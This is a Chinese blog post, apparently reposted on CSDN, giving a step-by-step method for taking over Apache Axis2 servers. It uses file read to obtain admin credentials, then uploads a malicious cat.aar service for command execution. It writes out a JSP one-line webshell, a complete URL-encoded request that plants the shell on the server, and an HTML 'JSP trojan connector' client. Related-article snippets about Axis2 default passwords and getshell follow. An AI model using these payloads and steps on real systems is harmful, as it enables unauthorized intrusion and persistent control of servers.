【实战】Axis2后台Getshell

最新推荐文章于 2024-04-23 09:39:31 发布
最新推荐文章于 2024-04-23 09:39:31 发布
阅读量884 收藏
点赞数
文章标签: shell java javascript ViewUI
原文链接:http://www.cnblogs.com/peterpan0707007/p/10569557.html
版权

实战遇到的情况---任意文件读取,读取/conf/axis2.xml内容,读取用户名和密码登录后台

1、上传cat.aar 

命令执行 

http://xx.xx.xx.xx/axis2/services/Cat/exec?cmd=whoami

2、获取classpath路径 

http://xx.xx.xx.xx/axis2/services/Cat/getClassPathResponse

3、上传jsp一句话

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

将其进行URL编码后上传,如下:

http://xx.xx.xx.xx/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/E:/j2ee/Tomcat6014/webapps/axis2/1.jsp&encoding=utf-8&append=false

本地客户端代码连接

<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button οnclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body> 

转载于:https://www.cnblogs.com/peterpan0707007/p/10569557.html

weixin_30566063
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次真实axis2渗透测试
systemino的博客
08-04 1165
一 前言 最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下 二 信息收集 首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。 通过目录扫描发现一些有用的信息 第一 axis2构建的webservice 第二 axis2后台登录地址(/axis2/axis2-admin/)存在 google axis2漏洞,发现多半都是默认口令...
springboot集成axis2-1.7.9实例
01-14
在本文中,我们将深入探讨如何将Apache Axis2与Spring Boot集成,以构建一个高效、可扩展的Web服务应用。Apache Axis2Java平台上的一个Web服务框架,它提供了高性能、灵活的服务开发和部署机制。而Spring Boot是...
技术分享|Tomcat低版本是怎样另类实现getshell
baidu_38876334的博客
03-30 156
目标网站是低版本Tomcat,攻防演练期间遇到很多低版本Tomcat网站,常规部署木马war包有时候会失效,最后通过部署axis2,然后在axis2中上传木马war包,则成功getshell。然后使用Axis2Shell将one.txt部署到指定文件夹下,path可以通过/services/config/getClassPath获取。cmd=whoami。1.直接木马转war包部署被拦截,而普通文本转war包部署可正常访问,可能是安全防护设备在作妖,那就只能试试常规绕过;部署成功后就可以进行命令执行。
Axis2口令 getshell 漏洞复现
Azjj
01-05 2224
Axis2 Axis2是下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中 默认后台:http://ip:p
Axis2Shell: 简化Apache Axis2服务管理的强大工具
最新发布
gitblog_00067的博客
04-23 854
Axis2Shell: 简化Apache Axis2服务管理的强大工具 项目地址:https://gitcode.com/Svti/Axis2Shell 在Web服务的世界中,Apache Axis2是一个流行的SOAP栈,它提供了强大的功能和灵活性。然而,管理和操作Axis2服务有时可能会变得复杂,尤其是对于新手开发者来说。这就是Axis2Shell发挥作用的地方,一个由Svti开发的开源命令...
Apache Axis2 后台文件上传getshell 漏洞复现
Adminxe的博客
01-06 2089
0x00 前言 Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本。 事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。 Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXISAXIS本质..
Axis2管理控制台登录用户
听雨轩
05-16 2256
Axis2在Tomcat上装好后,可以通过其自带的管理界面进行管理,该管理界面实现的功能: Welcome to the Axis2 administration console. From inside the Axis2 administration console you can : *** Check on the health of your Axis2 deployment...
axis2-1.7.9
10-10
《Apache Axis2 1.7.9:深入解析与应用》 Apache Axis2 是一个流行的开源Web服务引擎,用于创建和部署SOAP(简单对象访问协议)和RESTful Web服务。标题"axis2-1.7.9"指的是该软件的一个特定版本,即1.7.9,这通常...
axis2jar包下载
11-17
Axis2是Apache软件基金会开发的一个开放源码的Web服务平台,专门用于构建高效、可扩展且灵活的Web服务。在Java环境中,它扮演着核心的角色,为开发人员提供了一种强大的方式来创建和部署Web服务。本文将深入探讨Axis...
axis2 1.6.2 生产wsdl客户端代码
09-25
bin目录中的`axis2-1.6.2/bin/axis2-client.bat`(Windows)或`axis2-1.6.2/bin/axis2-client.sh`(Linux/Mac)脚本可用于执行命令行操作。 2. **生成客户端代码**: 进入bin目录,然后运行以下命令,将`your_wSDL_...
axis2-1.7.9.zip
09-27
"axis2-1.7.9.zip" 是一个包含Apache Axis2 1.7.9版本的二进制发行版的压缩文件。Apache Axis2是一个成熟的、高性能的Web服务引擎,用于创建和部署Web服务。它是Apache SOAP项目的下一代,专注于提供更强大的功能和...
axis2利用工具
08-16
axis图形化利用工具,一键使用,方便简单,欢迎使用。
Axis2用户帮助文档
xuzj2006的专栏
07-17 1114
概述这个说明文档涉及以下内容:Ø    如何使用 axis2 创建 web service 和客户端程序 Ø    如何定制一个模块 (Module) 并在 web service 中使用它 Ø    Samples discussion Ø    Advanced Topics   第一部分:简介  Axis2 是重新设计的一个架构,它没有基于 Axis1.* 的
axis2 利用小工具cat.aar
weixin_30357231的博客
07-08 460
Axis2: Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构)。 昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接。看起来别人可以修改response类型,但是我没成功。利用之前发的Cat小工具打包成aar就可以玩了。 axis2管理登陆默认配置了用户名为admin,密码axi...
利用Axis2默认口令安全漏洞可入侵WebService网站
weixin_33850015的博客
10-12 2031
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。 乌云Axis2默认口令安全弱点利用案例: 航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过) 乐信通某服务器axis2服务...
使用axis2进行WebService的开发
热门推荐
Hsing Hsu's Blog
10-30 4万+
使用axis2进行WebService的开发 Apache Axis2 是 Apache Axis SOAP 项目的后继项目。此项目是 Web 服务核心引擎的重要改进,目标是成为 Web 服务和面向服务的体系结构(Service-Oriented Architecture,SOA)的下一代平台。 axis2 WebService开发分为服务端开发与客户端开发,服务端开发为对外提供服务,客户
利用Axis2默认口令安全漏洞入侵WebService网站
weixin_33736832的博客
02-14 2837
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。黑吧安全网Axis2默认口令安全弱点利用案例:航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)中国科学...
Apache axis远程命令执行漏洞预警
systemino的博客
07-08 6954
近日,深信服发现Apache axis 组件远程命令执行漏洞利用方式。该漏洞本质是由于管理员对AdminService配置错误,当enableRemoteAdmin属性设置为true时,攻击者可以远程利用AdminService接口自行发布构造的WebService,再次访问生成的WebService接口时,就可以触发内部引用的类进行远程命令执行漏洞的利用。 axis 组件介绍 axis 全称...
axis2弱密码漏洞复现
信安是不可或缺的一部分!
12-30 4381
介绍 Axis2 Web 管理模块是一个下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 环境介绍 主机
axis2开发webservice 实战
09-14
下面是一个使用 Axis2 开发 Web 服务的实战步骤: 1. 安装 Axis2:首先,你需要下载并安装 Axis2。你可以从 Axis2 的官方网站上获得最新版本的下载链接。安装过程可能会因你使用的操作系统而有所不同,但通常情况下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值